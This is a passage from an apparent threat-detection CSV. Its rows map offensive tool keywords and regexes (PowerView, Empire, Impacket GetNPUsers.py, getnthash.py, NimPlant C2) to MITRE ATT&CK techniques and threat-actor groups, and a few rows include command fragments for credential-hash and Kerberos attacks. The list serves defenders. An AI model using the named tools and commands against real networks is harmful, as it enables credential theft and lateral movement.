PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46142" "*Get-NetLoggedon -*",".{0,1000}Get\-NetLoggedon\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46143" "*Get-NetLoggedon*",".{0,1000}Get\-NetLoggedon.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46144" "*Get-NetLoggedon*",".{0,1000}Get\-NetLoggedon.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46145" "*Get-NetNTLM-Hash *",".{0,1000}Get\-NetNTLM\-Hash\s.{0,1000}","offensive_tool_keyword","Get-NetNTLM","Powershell module to get the NetNTLMv2 hash of the current user","T1110.003 - T1557.001 - T1040","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/elnerd/Get-NetNTLM","1","0","N/A","N/A","7","1","93","18","2022-07-05T20:55:33Z","2019-02-11T23:09:54Z","46146" "*Get-NetRDPSession -*",".{0,1000}Get\-NetRDPSession\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46147" "*Get-NetRDPSession*",".{0,1000}Get\-NetRDPSession.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46148" "*Get-NetRDPSession*",".{0,1000}Get\-NetRDPSession.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46149" "*Get-NetSessionEnum.ps1*",".{0,1000}Get\-NetSessionEnum\.ps1.{0,1000}","offensive_tool_keyword","NetSess","Command line tool to enumerate NetBIOS sessions on a specified local or remote machine. ","T1016 - T1046 - T1087","TA0007 - TA0043","N/A","MUSTANG PANDA","Discovery","https://www.joeware.net/freetools/tools/netsess/","1","1","N/A","N/A","7","9","N/A","N/A","N/A","N/A","46151" "*Get-NetUser -SPN*",".{0,1000}Get\-NetUser\s\-SPN.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46154" "*Get-NetUser -UACFilter NOT_ACCOUNTDISABLE*",".{0,1000}Get\-NetUser\s\-UACFilter\sNOT_ACCOUNTDISABLE.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46156" "*getNimplantByGuid*",".{0,1000}getNimplantByGuid.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","46157" "*GetNPUsers.py 
-request*",".{0,1000}GetNPUsers\.py\s\-request.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46158" "*GetNPUsers.py*",".{0,1000}GetNPUsers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","46159" "*Get-NTDSdit*",".{0,1000}Get\-NTDSdit.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","46160" "*getnthash.py -key *",".{0,1000}getnthash\.py\s\-key\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# 
tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","46161" "*getnthash.py -key '8eb7a6388780dd52eb358769dc53ff685fd135f89c4ef55abb277d7d98995f72'*",".{0,1000}getnthash\.py\s\-key\s\'8eb7a6388780dd52eb358769dc53ff685fd135f89c4ef55abb277d7d98995f72\'.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46162" "*getnthash.py*",".{0,1000}getnthash\.py.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","46163" "*Get-NTLM.ps1*",".{0,1000}Get\-NTLM\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","46164" "*GetNTLMChallengeBase64*",".{0,1000}GetNTLMChallengeBase64.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","46165" "*Get-NTLMLocalPasswordHashes*",".{0,1000}Get\-NTLMLocalPasswordHashes.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - 
T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46166" "*getPac.py*",".{0,1000}getPac\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","46167" "*Get-PacketNetBIOSSessionService*",".{0,1000}Get\-PacketNetBIOSSessionService.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46168" "*Get-PacketNTLMSSPAuth*",".{0,1000}Get\-PacketNTLMSSPAuth.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46169" "*Get-PacketNTLMSSPNegotiate*",".{0,1000}Get\-PacketNTLMSSPNegotiate.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46170" "*Get-PacketRPCBind*",".{0,1000}Get\-PacketRPCBind.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46171" "*Get-PacketRPCRequest*",".{0,1000}Get\-PacketRPCRequest.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
